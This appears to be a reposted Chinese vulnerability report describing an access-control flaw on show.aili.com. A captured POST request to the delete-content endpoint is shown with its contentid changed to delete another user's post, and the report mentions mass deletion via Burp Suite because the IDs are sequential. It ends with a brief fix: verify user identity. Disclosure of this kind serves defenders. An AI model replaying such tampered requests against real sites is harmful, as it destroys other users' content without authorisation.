来源:自学PHP网 时间:2015-04-17 10:15 作者: 阅读:次
[导读] 1.注册两枚用户,各发布一条信息;2.点击删除一个用户发布的信息,抓包得到如下数据;POST /index.php HTTP/1.1Host: show.aili.comUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/......
1.注册两枚用户,各发布一条信息;
2.点击删除一个用户发布的信息,抓包得到如下数据;
POST /index.php HTTP/1.1
Host: show.aili.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:21.0) Gecko/20100101 Firefox/21.0
Accept: */*
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Referer: http://show.aili.com/index.php?m=member&s=2
Content-Length: 48
Cookie:
Connection: keep-alive
Pragma: no-cache
Cache-Control: no-cache
m=content&c=index&a=delcontent&contentid=7368892
3.我们获取另一个用户发布的信息ID;
4.把上面contentid值替换成“7368894”并提交,之后返回该用户页面刷新,发布的信息被成功删除;
PS:我们注意到contentid值是很有规律的,所以攻击者可使用burpsuite大量提交请求,可删除用户用户发布的信息!!
修复方案:
严格校验用户身份
|
自学PHP网专注网站建设学习,PHP程序学习,平面设计学习,以及操作系统学习
京ICP备14009008号-1@版权所有www.zixuephp.com
网站声明:本站所有视频,教程都由网友上传,站长收集和分享给大家学习使用,如由牵扯版权问题请联系站长邮箱904561283@qq.com